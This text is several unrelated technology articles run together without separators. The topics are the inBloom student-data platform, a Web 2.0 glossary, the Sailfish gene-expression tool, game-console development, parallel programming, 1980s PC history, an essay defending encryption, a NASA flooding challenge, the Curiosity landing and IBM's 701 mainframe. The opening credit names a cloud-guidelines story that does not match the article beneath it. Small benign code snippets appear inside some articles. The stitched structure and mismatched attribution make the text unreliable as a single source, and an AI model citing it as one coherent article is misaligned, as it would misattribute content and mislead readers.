This story, "Standards Body Sets Out Cloud Guidelines," was originally published by Techworld.com.
Some school administrators are testing a bold idea to integrate the multitude of systems that are used to store student data, giving teachers a single view of how students are performing and allowing them to better deliver the right learning materials. The idea, which builds on a project called inBloom that's partly funded by Bill Gates, would also provide a single repository for the best learning applications and content, which teachers could draw from in a model akin to the app stores run by Apple and Google.

It's just one way that schools are trying to put all their student databases, educational software and administrative systems under one roof as their use of educational technology grows. It has inevitably raised concerns about privacy and security, however.

Some say the arrival of such a system would be long overdue. "This has always been where I wanted to be able to go," said Jim Peterson, technology director at Bloomington Public Schools in Illinois, who was on a panel discussing the idea Thursday at the education arm of the South by Southwest conference in Austin, Texas. The district has about 100 different systems in its data centers, for student assessments, attendance, food services, transportation ... "you name it," Peterson said.

Bloomington embarked on an effort several years ago to integrate its data onto an easily accessible platform, but the effort failed because it was too big in scale, Peterson said. But now, as one of the districts in nine states working together to pilot the inBloom project, its schools are in a better position to succeed, he said.

InBloom, the brainchild of a nonprofit of the same name, is ultimately aimed at making learning more personalized for students through more efficient use of technology. In addition to the Bill & Melinda Gates Foundation, the Carnegie Corporation of New York is a major backer. The idea is that a better integrated technology and data analytics platform would provide a clearer picture of the student and make it easier to provide the right learning materials for that individual.

The system could make teachers' jobs a lot easier too. Christine Sauca, a math teacher in Massachusetts' Everett school district, described her typical day in the classroom: She takes attendance, looks up grade-book information, checks five or six different content management systems, and logs into services from different vendors the district has contracts with, such as PBS. Finally, she gets to teach. When the day is over, she spends more time completing observational assessments and eventually makes lesson plans for the next day.

Sauca logs into easily 10 or 15 different systems or pieces of software on any given day, she said. In the future, she's looking forward to a single sign-on model. "I'm going from paper systems to Word or Excel sheets to grade-book systems to state systems ... it's kind of all over the place," she said. But "the ability to go to one spot and do it all -- that is where I'm looking for all this to go," she said.

Ken Wagner, associate commissioner of curriculum assessment and educational technology for the New York state education department, described inBloom as "boring plumbing stuff"; if it works right, teachers shouldn't need to pay attention to it. "What's interesting is the stuff built on top of it," he said. InBloom's roster of technology partners includes providers of learning tools like Agilix, Clever, Compass Learning and BloomBoard, as well as Amazon and Dell.
Parent groups and privacy advocates have voiced concerns about the potential for data abuse or security breaches given all the information that inBloom would have access to. Panelists acknowledged those concerns, saying inBloom is working hard to provide answers to questions about privacy and security, and that the system is in compliance with state and federal regulations. Bill Gates himself delivered the closing keynote address at the South by Southwest education show, where he espoused the benefits of technology in education and said schools are at a "technology tipping point."
Flash: A program that lets users create animation for the Web.

Blog: A portmanteau combining Web and log. It is a user-generated Web site on which entries often are journal-style and provide news or the writer's commentary on a topic.

Blogosphere: The term that refers to the social network of all blogs on the Internet.

Facebook: A social networking site that initially was limited to college students but was extended to the general public in September 2006. As of July, Facebook had 47 million users.

Mashup: A Web site or application that combines content from more than one source into an integrated experience.

MySpace: A general-interest, social-networking site. As of September 2007 it had more than 200 million global users.

Podcast: A digital file that is distributed over the Internet via syndication feeds. It is designed for playback on MP3 players.

Social Networks: Internet applications that help connect friends, business partners or other individuals using a variety of tools. Examples of online social networks are MySpace, Facebook, Friendster and LinkedIn.

Virtual World: A computer-based simulated environment intended for its users to inhabit and interact via avatars.

Web 2.0: Term coined by O'Reilly Media in 2004 used to describe the Internet applications that arose amid the ashes of the dot-com collapse. Particular focus has been given to user-created content, lightweight technology, service-based access and shared-revenue models.

Wiki: A type of Web site that allows visitors to easily add, edit and remove content. The term wiki also can refer to the collaborative software itself.

Sources: Gartner, O'Reilly Media, Wikipedia, TowerGroup
PITTSBURGH, Penn., April 21 — With gene expression analysis growing in importance for both basic researchers and medical practitioners, researchers at Carnegie Mellon University and the University of Maryland have developed a new computational method that dramatically speeds up estimates of gene activity from RNA sequencing (RNA-seq) data.

With the new method, dubbed Sailfish after the famously speedy fish, estimates of gene expression that previously took many hours can be completed in a few minutes, with accuracy that equals or exceeds previous methods. The researchers' report on their new method is being published online April 20 by the journal Nature Biotechnology.

Gigantic repositories of RNA-seq data now exist, making it possible to re-analyze experiments in light of new discoveries. "But 15 hours a pop really starts to add up, particularly if you want to look at 100 experiments," said Carl Kingsford, an associate professor in CMU's Lane Center for Computational Biology. "With Sailfish, we can give researchers everything they got from previous methods, but faster."

Though an organism's genetic makeup is static, the activity of individual genes varies greatly over time, making gene expression an important factor in understanding how organisms work and what occurs during disease processes. Gene activity can't be measured directly, but can be inferred by monitoring RNA, the molecules that carry information from the genes for producing proteins and other cellular activities. RNA-seq is a leading method for producing these snapshots of gene expression; in genomic medicine, it has proven particularly useful in analyzing certain cancers.

The RNA-seq process results in short sequences of RNA, called "reads." In previous methods, the RNA molecules from which they originated could be identified and measured only by painstakingly mapping these reads to their original positions in the larger molecules. But Kingsford, working with Rob Patro, a post-doctoral researcher in the Lane Center, and Stephen M. Mount, an associate professor in Maryland's Department of Cell Biology and Molecular Genetics and its Center for Bioinformatics and Computational Biology, found that the time-consuming mapping step could be eliminated. Instead, they found they could allocate parts of the reads to different types of RNA molecules, much as if each read acted as several votes for one molecule or another. Without the mapping step, Sailfish can complete its RNA analysis 20-30 times faster than previous methods.

This numerical approach might not be as intuitive as a map to a biologist, but it makes perfect sense to a computer scientist, Kingsford said. Moreover, the Sailfish method is more robust — better able to tolerate errors in the reads or differences between individuals' genomes. These errors can prevent some reads from being mapped, he explained, but the Sailfish method can make use of all the RNA read "votes," which improves the method's accuracy.

The Sailfish code has been released and is available for download at http://www.cs.cmu.edu/~ckingsf/software/sailfish/. This work was supported in part by the National Science Foundation and the National Institutes of Health.

About Carnegie Mellon University

Carnegie Mellon (www.cmu.edu) is a private, internationally ranked research university with programs in areas ranging from science, technology and business, to public policy, the humanities and the arts.
More than 12,000 students in the university’s seven schools and colleges benefit from a small student-to-faculty ratio and an education characterized by its focus on creating and implementing solutions for real problems, interdisciplinary collaboration and innovation. A global university, Carnegie Mellon has campuses in Pittsburgh, Pa., California’s Silicon Valley and Qatar, and programs in Africa, Asia, Australia, Europe and Mexico. Source: Carnegie Mellon University
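The "reads as votes" idea described above can be sketched in a few lines. The toy code below allocates each read's vote among candidate transcripts in proportion to shared k-mers; it is not the Sailfish algorithm itself, whose published method is considerably more sophisticated (a k-mer index plus an iterative statistical allocation rather than this one-shot split), and the names and the tiny k-mer length are purely illustrative.

```python
# Toy illustration of alignment-free "voting": each read distributes a unit of
# weight across the transcripts that share its k-mers. Not the Sailfish code.
from collections import defaultdict

K = 5  # toy k-mer length; real tools use much longer k-mers on real data

def kmers(seq, k=K):
    return {seq[i:i + k] for i in range(len(seq) - k + 1)}

def allocate_votes(reads, transcripts):
    """Split each read's single 'vote' among transcripts sharing its k-mers."""
    index = {name: kmers(seq) for name, seq in transcripts.items()}
    votes = defaultdict(float)
    for read in reads:
        rk = kmers(read)
        hits = {name: len(rk & tk) for name, tk in index.items() if rk & tk}
        total = sum(hits.values())
        for name, count in hits.items():
            votes[name] += count / total   # fractional vote, no alignment step
    return dict(votes)
```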
The gaming industry has come a long way since its humble beginnings more than thirty years ago. From a time when people were thrilled to see a square white block and two rectangular paddles on the screen to today, where gamers explore realistic three-dimensional worlds in high resolution with surround sound, the experience of being a gamer has changed radically.

The experience of being a game developer has changed even more. In the early 1980s, it was typical for a single programmer to work on a title for a few months, doing all the coding, drawing all the graphics, creating all the music and sound effects, and even doing the majority of the testing. Contrast this to today, where game development teams can have over a hundred full-time people, including not only dozens of programmers, artists and level designers, but equally large teams for quality assurance, support, and marketing.

The next generation of consoles will only increase this trend. Game companies will have to hire more artists to generate more detailed content, add more programmers to optimize for more complex hardware, and even require larger budgets for promotion. What is this likely to mean for the industry? This article makes the following predictions:

- The growing cost of development for games on next-gen platforms will increase demand from publishers to require new games to be deployed on many platforms.
- Increased cross-platform development will mean less money for optimizing a new game for any particular platform.
- As a result, with the exception of in-house titles developed by the console manufacturers themselves, none of the three major platforms (Xbox 360, PS3 and Nintendo Revolution) will end up with games that look significantly different from each other, nor will any platform show any real "edge" over the others.

Many games will be written to a "lowest common denominator" platform, which would be two threads running on a single CPU core and utilizing only the GPU. All other market factors aside, the platform most likely to benefit from this situation is the Revolution, since it has the simplest architectural design. The PC, often thought to be a gaming platform on the decline, may also benefit. Conversely, the platforms that may be hurt the most by this are the PlayStation 3 and the Xbox 360, as they may find it difficult to "stand out" against the competition.

These are bold statements, and I don't expect to make them without at least attempting to back them up with a more detailed argument, nor do I expect them to go unchallenged. In fact, I reserved a section at the end of the article where I describe all the problems I could find with my theory. So the fullness of my argument can best be understood by reading through to the conclusion, and I would encourage readers to do that prior to engaging in conversation in the discussion thread.

I should also add that I fully expect all three next-generation platforms and also the gaming PC to survive and do reasonably well. The console wars will require at least another round after the next one before they have any sort of resolution. Ultimately, platforms themselves may reach a point where they no longer matter, as most content will be available on every gaming device. Our grandchildren may look at us strangely when we recall the intense and urgent battles between Atari and Intellivision, Nintendo and Sega, and Microsoft and Sony. At least we will have the satisfaction of knowing that we lived through the period when gaming went through some of its greatest advances.
The most widely used computer programming languages today were not designed as parallel programming languages. But retrofitting existing programming languages for parallel programming is underway. We can compare and contrast retrofits by looking at four key features, five key qualities, and the various implementation approaches. In this article, I focus on the features and qualities, leaving the furious debates over best approaches (language vs. library vs. directives, and abstract and portable vs. low-level with lots of controls) for another day.

Four features we need

Any parallel programming solution, including a retrofit, should provide four features: a defined memory model, synchronization, tasks, and data parallelism.

Defining how changes in shared data are observable by different tasks had been an under-appreciated problem. Hans-J. Boehm wrote a report in 2004, titled Threads Cannot Be Implemented As a Library, which explains these issues. Having a well-defined ordering among accesses to distinct variables, and enabling the independence of updates to distinct variables, is so important that they have been addressed in Java, C11 and C++11. Without these retrofits, every parallel program sits on a crumbling foundation.

The need for portable and efficient synchronization is substantial. Boost libraries, Intel's Threading Building Blocks (TBB) and OpenMP offer solutions that are widely utilized. C++11 and C11 now offer support. Beyond these, the concept of transactions is a topic worth exploring in a future article. Synchronization retrofitting is helping portability. Substantial opportunities remain for helping efficiency.

Tasks, not threads

Programming should be an exercise in writing tasks that can run concurrently, without the programmer specifying the precise mapping of tasks onto hardware threads. An introduction to this challenge is The Problem with Threads by Edward A. Lee. Mapping should be the job of tools, including run-time schedulers, not explicit programming. This philosophy is being well supported by retrofits like OpenMP, TBB, Cilk Plus, Microsoft's Parallel Patterns Library (PPL) and Apple's Grand Central Dispatch (GCD). The need to assert some control over task-to-thread mapping to maximize performance is still present when using such systems today, but not always supported. Nevertheless, programming directly to native threads (e.g., pthreads) in applications is something that should be completely avoided. Retrofits are sufficient today to make tasks the method of choice.

Data parallel support

It should be reasonably straightforward to write a portable program that takes advantage of data parallel hardware. Ideally, data parallel support should be able to utilize vector and task parallel capabilities without a programmer having to explicitly code the division between the two. Unfortunately, no such solution is in widespread use today even for vectorization alone. Effective auto-parallelization is very dependent on highly optimizing compilers. Compiler intrinsics lock code into a particular vector width (MMX=64, SSE=128, AVX=256, etc.). Elemental functions in CUDA, OpenCL, and Cilk Plus offer a glimpse into possible retrofits. Intel proposes we adopt the vectorization benefits of Fortran 90 array notations into C and C++ as part of the Cilk Plus project. Vector hardware is increasingly important in processors, GPUs and co-processors. OpenCL and OpenMP wrestle today with how to embrace data parallel hardware and how tightly tied programming will be to it. Microsoft C++ AMP has similar challenges when it comes to market with the next Microsoft Visual Studio. Standard, abstract, portable and effective solutions wanted!
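Of the four features, the "tasks, not threads" idea is the easiest to show in miniature. The sketch below uses Python's standard-library concurrent.futures purely as an illustration; it is not one of the C/C++ retrofits discussed in this article, but it shows the shape of task-based code: the program expresses independent work items, and a scheduler, not the programmer, decides how they map onto hardware threads.

```python
# Illustrative only: task-based parallelism with Python's standard library.
# The program submits logical tasks; the executor owns the thread mapping.
from concurrent.futures import ThreadPoolExecutor

def word_count(path):
    """One independent task: count the words in a single file."""
    with open(path, encoding="utf-8") as f:
        return path, sum(len(line.split()) for line in f)

def count_all(paths, max_workers=None):
    # max_workers defaults to letting the runtime choose, mirroring the idea
    # that task-to-thread mapping is the scheduler's job, not the programmer's.
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return dict(pool.map(word_count, paths))
```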
Five qualities we should desire

Five key qualities are desirable in a parallel programming solution: composability, sequential reasoning, communication minimization, performance portability and safety. All of these qualities are unobtainable, in an absolute sense, whether as retrofits in an old language or with a clean slate and a new language. That is why we cannot call them features. The more of these qualities we obtain, the better off we are. That makes them very important to keep in mind.

Composability is a well-known concept in programming, offering rules for combining different things together (functions, objects, modules, etc.) so that it is easy to compose (think: combine in unanticipated ways). It is important to think of composability in terms of both correctness and performance. OpenCL, largely because it is less abstract, has low composability on both accounts. OpenMP and OpenCL have very serious performance composability problems unless they are used very carefully. New and abstract retrofits (TBB, Cilk, PPL, GCD) are much more tolerant and able to deliver high composability. Self-composability is an essential first step, but the ability to compose multiple retrofits together is essential in the long run as well. A welcome solution for tool vendors, Microsoft's Concurrency Runtime has allowed retrofits from multiple vendors to coexist with increased composability. Parallel programming without the ability to mix and match freely is undesirable and counterproductive. Composability deserves more attention than it gets.

Sequential reasoning, the norm for reading a serial implementation, can apply with an appropriately expressed parallel program. OpenMP uses hints to create the use of parallelism instead of code changes. This allows the intent of a program to remain evident in the code. TBB and PPL emphasize relaxed sequential semantics to provide parallelism as an accelerator without making it mandatory for correctness. Writing a program in a sequentially consistent fashion is permitted and encouraged. An explicit goal of Cilk Plus is to offer sequential semantics to set it apart from other retrofits. The serial elision (or C elision) of a Cilk program is touted in papers from MIT. Programming that preserves sequential semantics has received praise as easier to learn and use. The elemental functions in OpenCL, CUDA and Cilk Plus have similar objectives. It is fair to say that programming in a manner that requires understanding parallel semantics, in order to understand intent, is both unpopular and out of vogue today. Such mandatory parallelism is harder to understand and to debug. Sequential reasoning can be extended to debuggers too. A hot area to watch here is debuggers working to present a debugging experience more akin to sequential experiences, with features like Rogue Wave's replay capabilities in the Totalview debugger. Instead of sequential reasoning being a retrofit, it is more accurate to think of sequential reasoning as often being purposefully sought and preserved in a parallel world.

Performance tuning on parallel systems often focuses on ensuring data is local when you use it and minimizing the need to move it around. Data motion means communication of some sort, and communication is generally expensive.
Decisions in the design and implementation of retrofits, as well as the application programming itself, often impact performance dramatically. The task-stealing algorithms of TBB, Cilk, PPL and GCD all have cache reuse strongly in mind in their designs. Retrofits to help with communication minimization are a tricky business and could use more attention.

The goal of performance portability is that a program tuned on one piece of hardware performs reasonably well on another piece of hardware. It is desirable to be able to describe data and tasks in such a way that performance scales as parallelism increases (number of cores, or size of vectors, or cache size, etc.). Nothing is ever fully performance portable, but more abstract retrofits tend to hold up better. Unfortunately, implementations of abstractions can struggle to offer peak performance. It took years for compilers to offer performance for MMX or SSE that was competitive with assembly language programming. Use of cache-agnostic algorithms generally increases performance portability. Today, competing on performance with carefully crafted CUDA and OpenCL code can be challenging because the coding is low level enough to encourage, or even require, the program structure to match the hardware. The lack of performance portability of such code is frequently shown, but effective alternatives remain works in progress. Language design, algorithm choices and programming style can affect performance portability a great deal.

Safety, the freedom from deadlocks and race conditions, may be the most difficult quality to provide via a retrofit. No method to add complete safety to C or C++ has gained wide popularity. Safety has not been incorporated into non-managed languages easily, despite some valiant efforts to do so. To make a language safe, pointers have to be removed or severely restricted. Meanwhile, tools are maturing to help us cope with safety despite the lack of direct language support, and safer coding styles and safer retrofits appear to help as well. Perhaps safety comes via a combination of "good enough" and "we can cope using tools."

A journey ahead, together

There are at least four key programming problems that any parallel programming solution should address, and five key qualities that can make a programming model, retrofit or otherwise, more desirable. Evolution in hardware will help as well.

About the author

James Reinders has helped develop supercomputers, microprocessors and software tools for 25 years. He is a senior engineer for Intel in Hillsboro, Oregon.
The rise of the PC (1987-1990)

In 1985, Bill Gates wrote an amazing memo to Apple management. In the memo, he praised the Macintosh for its innovative design, but noted that it had failed to become a standard, like the IBM PC was becoming. He correctly deduced that it was the advent of inexpensive, 100%-compatible clone computers that was propelling the PC ahead, and that any defects in the design of the computer would eventually be remedied by the combined force of the many companies selling PCs and PC add-on products, such as new graphics cards. He proposed a plan, which Microsoft would help bring to fruition, whereby Apple would license their operating system and hardware design to a number of other computer companies. Microsoft had been an early supporter and promoter of the Macintosh, but Gates feared that without compatible machines, it would fail to become a "second standard." Apple management ignored the memo, and decided to concentrate instead on making better computers themselves.

The Macintosh II, introduced in 1987 for US$5,500, eschewed the original's all-in-one design in favor of a standard desktop chassis that supported add-in cards, and could be connected to a color monitor. Professional users loved it, although the price kept it out of the hands of most buyers.

The Macintosh II. Users could add their own video cards using the NuBus

Commodore finally introduced the more-powerful and -expandable Amiga 2000 (US$1495) and the cheaper Amiga 500 (US$595) with integrated keyboard, in 1987. The latter was expected to take over the Commodore 64's place as a cheap yet powerful home computer for the masses, and sales rose, peaking at over 1 million units in 1991.

Top: Amiga 2000. Bottom: Amiga 500

Meanwhile, the Atari ST's momentum tailed off, with sales slowly declining as better games started coming out designed specifically for the Amiga 500. Atari did not release any new models of the ST except for a version with extra RAM preinstalled. Thanks to the inclusion of a MIDI port with every model, however, the ST became the computer of choice for digital musicians.

But the real winner of this era was the IBM PC platform. Sales kept increasing, and by 1990 PC and clone sales had more than tripled to over 16 million a year, leaving all competitors behind. The platform went from a 55% market share in 1986 to an 84% share in 1990. The Macintosh stabilized at about 6% market share and the Amiga and Atari ST at around 3% each. Bill Gates' predictions were coming true, as new, inexpensive graphics cards that cloned the new IBM VGA standard were starting to make the PC a credible game platform.

In 1990, Origin released the first Wing Commander game. Its 256-color, scaled, and rotated bitmaps gave the illusion of 3D and made existing 2D space shooters on other computers, game consoles and arcades seem instantly outdated and quaint by comparison. 3D came to role-playing games with Ultima Underworld in 1992 and fast-action first-person shooters with Wolfenstein 3D the same year. Now it was the PC that was setting the standard for new games, instead of the Amiga.

Personal computer market share during the late 80s
The devil is not in these details: Why encryption isn't evil

This feature first appeared in the Winter 2016 issue of Certification Magazine.

Editor's Note: This feature was written and published prior to the emergence of the current dispute between Apple and the FBI and therefore does not directly reference those proceedings.

In the past few months, deadly terrorist attacks rocked San Bernardino, Calif., and shattered the French capital city of Paris. The technical investigation following both incidents largely focused on questions regarding digital communication and coordination among the attackers using standard encryption protocols to avoid eavesdropping by law enforcement and intelligence organizations.

Encryption is already a hot-button topic in cybersecurity. These dramatic breaches of public safety have sparked a worldwide debate regarding the widespread use of encryption, and its role in barring government access to private communications. There's one bottom line question: Is encryption a sinister tool being used to serve nefarious ends?

Politicians and presidential candidates were quick to condemn the attacks, but also used their soapboxes to rail against encryption technology as a tool of terrorism. In a Democratic presidential debate, Hillary Clinton called for "a Manhattan-like project" focused on encryption. Republican presidential candidate John Kasich struck a similar tone in arguing that "we have to solve the encryption problem." There's certainly an undertone in the national conversation that encryption is an unwanted technology that facilitates terrorism — and that the government must take action to protect Americans from it.

Kasich and Clinton are correct that there is an encryption "problem," but the problem is not that the technology is available. The real problem is that the technology is not well understood. Many average citizens are surprised to learn that encryption is a part of their everyday life and that the security it provides routinely protects their credit card information, healthcare records and other sensitive data from prying eyes. Encryption is not a problem to be solved: It is a technology to be embraced as a cornerstone of every organization's information security program. The government itself relies heavily upon encryption technology and spends millions of dollars annually developing new encryption methods. How can government officials decry encryption as a terrorist weapon while simultaneously using it to protect sensitive information?

What is encryption?

Encryption is, quite simply, a set of mathematical formulas. In its most basic form, encryption algorithms take plaintext messages and use a secret key to transform them into an encrypted form that is unintelligible by anyone who does not have access to the corresponding decryption key. Encryption algorithms are public knowledge. Any university-level computer science student has the skills required to write a small piece of software that implements military-grade encryption technology in a matter of weeks. The government would have as much luck banning encryption as they would banning algebra or physics.
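To make that point concrete, here is a sketch of how little effort strong encryption takes today, using the third-party Python cryptography package's Fernet recipe (an AES-based, authenticated encryption construction). The package and its API are real; the snippet itself is purely illustrative and not a security recommendation.

```python
# A few lines of off-the-shelf, strong symmetric encryption (illustrative only).
# Requires the third-party "cryptography" package: pip install cryptography
from cryptography.fernet import Fernet

key = Fernet.generate_key()      # secret key; whoever holds it can decrypt
cipher = Fernet(key)

token = cipher.encrypt(b"meet at the usual place at noon")
print(token)                     # unintelligible without the key
print(cipher.decrypt(token))     # original plaintext, recoverable only with the key
```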
What would you think if you learned that your neighbor was using advanced military-grade encryption algorithms to protect files stored on his smartphone or laptop computer? How about if he was using encrypted messaging technology to apply the Advanced Encryption Standard to text messages that he exchanged with others around the world? Does this sound sinister? It's not. This description could not only easily fit your actual neighbor, but it most likely applies to you as well.

Where is encryption used?

If you have a laptop computer issued by your employer, it's more likely than not that the entire hard drive is encrypted to protect the contents from prying eyes. Companies do this as a matter of routine to protect themselves in the event that the device is later lost or stolen. If a hard drive is encrypted, nobody can gain access to the files stored on the drive without having access to the corresponding decryption key, which is usually encoded with the laptop user's password.

Do you own an iPhone or Android smartphone? Both devices automatically encrypt all of the information stored on the device for similar reasons. Current versions of iOS and Android prevent anyone other than the phone's owner from gaining access to the encrypted data. Even if Apple or Google wanted to cooperate with government investigators (or anyone else for that matter), they simply don't have access to your sensitive information. They designed their operating systems this way on purpose. This level of security protects your data with strong encryption that prevents anyone from gaining unauthorized access. Isn't that what you expect from your phone or tablet?

Have you ever logged onto your bank account online, checked your email over the web or visited the White House website? If you've done any of these things, you've used the HTTPS protocol to communicate securely with the remote web server. HTTPS uses strong encryption to protect your data from prying eyes while in transit. Yes, that's right — the White House website requires that citizens visiting its web site use strong encryption to browse the site. Go give it a try. If you type whitehouse.gov into your browser's address bar, notice that it quickly changes to https://whitehouse.gov. The "s" in "https" indicates that strong encryption is in use. How can government officials claim that the use of encryption is a problem when they force citizens to use it every day?

What do politicians want?

As with many political conversations, it's difficult to understand exactly what politicians are calling for when they speak out against encryption technology. Hillary Clinton, when asked how she would address encryption, admitted that, despite viewing encryption as a danger, she doesn't really know what could be done to neutralize it: "It doesn't do anybody any good if terrorists can move toward encrypted communication that no law enforcement agency can break into before or after, there must be some way. I don't know enough about the technology … to be able to say what it is."

FBI Director James Comey has been similarly confusing in his plea for action against encryption technology. In a 2014 speech, he warned listeners that, "Justice may be denied because of a locked phone or an encrypted hard drive." He went on to say that "We aren't seeking a backdoor approach. We want to use the front door, with clarity and transparency, and with clear guidance provided by law." Unfortunately, Comey doesn't provide any technical details on how his so-called "front door" would actually work. By the way, it's not just the White House website that forces the use of encryption — citizens visiting Director Comey's FBI.gov site are also forced to use encrypted communications.

What's wrong with these government requests?
The bottom line is that the requests by government officials and political candidates simply aren't feasible. When pressed for technical details on their plans to subvert (when necessary) or replace encryption technology, they merely assert that technical people can figure it out. What no one says openly is that such an approach is simply not feasible, practical, or even advisable. There is no direct means of providing government officials with access to encrypted communications without fundamentally weakening the technology itself. The National Security Agency tried to develop this type of backdoor back in 1993 when they proposed the Clipper Chip: an encryption device with a government backdoor. That device failed miserably when the technology industry refused to adopt it.

Two of the congressmen who attended a hearing where Director Comey made his pitch for a government backdoor later sent him a letter explaining their objections to his proposal. Rep. Will Hurd, R-Texas, and Rep. Ted Lieu, D-Calif., have an interesting shared background — they are both not only congressmen, but also trained computer scientists. In their letter to Comey they wrote:

Any vulnerability to encryption or security technology that can be accessed by law enforcement is one that can be exploited by bad actors, such as criminals, spies, and those engaged in economic espionage. It is important to remember that computer code and encryption algorithms are neutral and have no idea if they are being accessed by an FBI Agent, a terrorist, or a hacker. During our oversight hearing, it was clear that none of the witnesses were willing to assert that a backdoor would be completely air-tight and secure. Moreover, demanding special access also opens the door for other governments with fewer civil liberties protections to demand similar backdoors.

The congressmen are correct. Encryption is an essential technology for safeguarding sensitive information. The fact that terrorists use encryption technology is not a reason to deprive American citizens and others the use of secure communications methods. The government must find other means to counter terrorist threats and provide security against terrorism without jeopardizing the security of our private information.

Any technology in the wrong hands can be used to bring sinister designs to fruition. That doesn't make the technology itself corrupt, or mean that no one should ever use it for anything. Fear of terror that prevents technological tools from serving the public good is only accomplishing the aims of terrorists. Encryption is not evil.
Coastal flooding challenge uses cross-agency data

NASA recently announced a new challenge focusing on coastal flooding to encourage entrepreneurs, technologists, and developers to create visualizations and simulations that will help people understand their exposure to coastal-inundation hazards and other vulnerabilities. The challenge will be included as part of the third annual International Space Apps Challenge, which will be held from April 11-13. It was developed by NASA and the National Oceanic and Atmospheric Administration, and is based on cross-agency data.

The aim of the Coastal Inundation in Your Community challenge is to create tools and provide information so communities can prepare for coastal catastrophes. "Solutions developed through this challenge could have many potential impacts," said NASA Chief Scientist Ellen Stofan. "This includes helping coastal businesses determine whether they are currently at risk from coastal inundation and whether they will be impacted in the future by sea level rise and coastal erosion."

Many federal data sets are now available that illustrate the hazards of coastal inundation. As part of the Climate Data Initiative, the government has gathered data sets related to coastal vulnerability and the impact of future climate changes on flooding. The data sets will be available on climate.data.gov. The data comes from NOAA, NASA, the Federal Emergency Management Administration, the U.S. Geological Survey, the Environmental Protection Agency, the Army Corps of Engineers, the departments of Commerce and Defense, as well as from New York and New Jersey.

The purpose of the larger International Space Apps Challenge is to contribute to space exploration missions and improve life on earth. Participants introduce these solutions by developing mobile apps, software, hardware, data visualization and platform solutions. They will have access to over 200 data sources, including data sets, data services and tools. The challenge will be hosted at 100 locations over six different continents.

Posted by Mike Cipriano on Apr 10, 2014 at 8:40 AM
One of the most complicated missions ever attempted by NASA, the landing of the one-ton rover Curiosity inside a crater on Mars after a 500 million kilometer journey, has apparently gone without a hitch. Curiosity landed at 10:32 p.m. Pacific Time on Sunday, 5:32 GMT Monday, and it wasn't long before the first pictures arrived, including one of the Martian surface framed by Curiosity's wheel.

At a post-landing news conference, the scientists in charge of the program were welcomed like rock stars, and could barely contain their excitement. (You can watch a video of the event on YouTube.) "So that rocked. Seriously. Was that cool or what?" said Richard Cook, Deputy Project Manager, Mars Science Laboratory.

The jubilation at the landing capped a tense evening as the craft, as big as a car, hurtled towards Mars at almost 6,000 meters per second. A parachute slowed it down about 11 kilometers above the surface and then at 20 meters above the ground a brand new landing procedure, a rocket-propelled sky crane, lowered Curiosity onto Mars. None of this was controlled in real time. A 14-minute communications delay meant it all had to be programmed in advance, with no room for error. Had anything gone even slightly wrong, Curiosity would have smashed into the planet and the US$2.5 billion mission would have been a complete failure.

NASA Administrator Charles Bolden said: "Nothing in robotic planetary exploration is harder, more technically challenging, or as risky as landing on the surface of Mars, and I know most of you are saying 'How can he be saying that? It just looked so easy.' Trust me. Historically, counting all the missions by all countries, the odds of success are about 40 percent. The recent U.S. record is better with now six successful missions including now four landings."

Now begins a projected two-year mission. Planetary scientist Chris McKay at NASA Ames Research Center in northern California will use Curiosity to look for organic compounds in the Martian dirt. "There're two important advances that I think Curiosity will bring to scientists like me," said McKay. "One is the ability to go up to different outcrops and different soil types and sample them. Dig in, pick something up and analyze it. And the other is the instruments themselves are much more sophisticated than previous examples. In the case of the instrument I'm involved in, the organic analyzer, this instrument has modes that the previous organic instrument on Viking did not have. And I think these modes will allow us to detect definitively, on Mars, the presence of organics. So I'm hoping that in maybe a couple of months, I can stand before you again and say yes, we know there are organics on Mars, here's their concentration, here's the type of organics that are there. That's very exciting. It's the first step towards advancing our knowledge of whether there was life on Mars and could we find evidence of it."

With a team of 300 scientists working on the program, NASA hopes that's just one of many findings to come.
Remembering IBM's first mainframe, the 701

IBM's new zEnterprise EC12 mainframe boasts a power boost compared to the z196, the machine it replaces. System-wise, the EC12 features a 5.5-GHz, six-core processor, 101 cores (vs. 80 on the current z196), 161 capacity settings (vs. 125 on the z196), 3TB of memory and a radiator-based air-cooled system. Maybe that's not a giant leap in processing power over its predecessor, but it is practically a new species compared with IBM's original mainframe.

IBM announced the delivery of its first mainframe on March 27, 1953: the 701 Data Processing System, of which 19 would be built that year, all of them destined for government agencies or defense industries. "The calculators," IBM said, would rent for $11,900/month, which would get customers a machine that can perform "more than 16,000 addition or subtraction operations a second, and more than 2,000 multiplication or division operations a second."

Unlike its predecessor, the Selective Sequence Electronic Calculator, the 701 was not built into the room that housed it and took advantage of "all three of the most advanced electronic storage, or memory devices -- cathode ray tubes, magnetic drums and magnetic tapes."

Components of the 701 included an electronic analytical control unit, an electrostatic storage unit, a punched card reader, an alphabetical printer, a punched card recorder, two magnetic tape readers and recorders (each including two magnetic tapes), a magnetic drum reader and recorder, and units governing power supply and distribution.

Of the 19 701s built, several were installed in government laboratories to speed calculations. At the National Oceanic and Atmospheric Administration, the Joint Numerical Weather Prediction Unit installed an IBM 701 computer in March 1955 to produce operational numerical weather prediction. At the Lawrence Livermore National Laboratory, the arrival of an IBM 701 in 1954 meant that scientists could run nuclear explosives computations much faster.

For more big iron, visit IBM's mainframes photo album.